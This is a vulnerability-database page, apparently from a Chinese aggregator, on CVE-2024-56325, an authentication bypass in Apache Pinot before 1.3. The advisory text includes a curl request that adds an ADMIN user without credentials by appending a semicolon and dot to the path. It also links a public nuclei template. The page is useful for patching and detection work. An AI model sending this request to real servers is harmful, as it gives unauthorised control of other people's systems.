Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-56325— Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required

EPSS 17.41% · P95
Get alerts for future matching vulnerabilitiesLog in to subscribe

I. Basic Information for CVE-2024-56325

Vulnerability Information
Have questions about the vulnerability? See if Shenlong's analysis helps!
View Shenlong Deep Dive ↗

Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.

Vulnerability Title
Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required
Source: NVD (National Vulnerability Database)
Vulnerability Description
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Source: NVD (National Vulnerability Database)
CVSS Information
N/A
Source: NVD (National Vulnerability Database)
Vulnerability Type
使用候选路径或通道进行的认证绕过
Source: NVD (National Vulnerability Database)
Vulnerability Title
Apache Pinot 安全漏洞
Source: CNNVD (China National Vulnerability Database)
Vulnerability Description
Apache Pinot是美国阿帕奇(Apache)基金会的一个实时分布式 OLAP 数据存储。旨在提供超低延迟分析。 Apache Pinot 1.3之前版本存在安全漏洞,该漏洞源于认证绕过问题,允许未授权用户添加新用户并控制系统。
Source: CNNVD (China National Vulnerability Database)
CVSS Information
N/A
Source: CNNVD (China National Vulnerability Database)
Vulnerability Type
N/A
Source: CNNVD (China National Vulnerability Database)

Affected Products

VendorProductAffected VersionsCPESubscribe
Apache Software FoundationApache Pinot 0 ~ 1.3 -

II. Public POCs for CVE-2024-56325

#POC DescriptionSource LinkShenlong Link
1This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system. https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-56325.yamlPOC Details
AI-Generated POCPremium

No public POC found.

Login to generate AI POC

III. Intelligence Information for CVE-2024-56325

登录查看更多情报信息。

Same Patch Batch · Apache Software Foundation · 2025-04-01 · 6 CVEs total

CVE-2025-30676Apache OFBiz: Stored XSS Vulnerability
CVE-2025-30177Apache Camel: Camel-Undertow Message Header Injection via Improper Filtering
CVE-2025-29868Apache Answer: Using externally referenced images can leak user privacy.
CVE-2025-30065Apache Parquet Java: Arbitrary code execution in the parquet-avro module when reading an A
CVE-2025-27427Apache ActiveMQ Artemis: Address routing-type can be updated by user without the createAdd

IV. Related Vulnerabilities

Same product: Apache Pinot
Same vendor: Apache Software Foundation
Same weakness: CWE-288

V. Comments for CVE-2024-56325

No comments yet

Leave a comment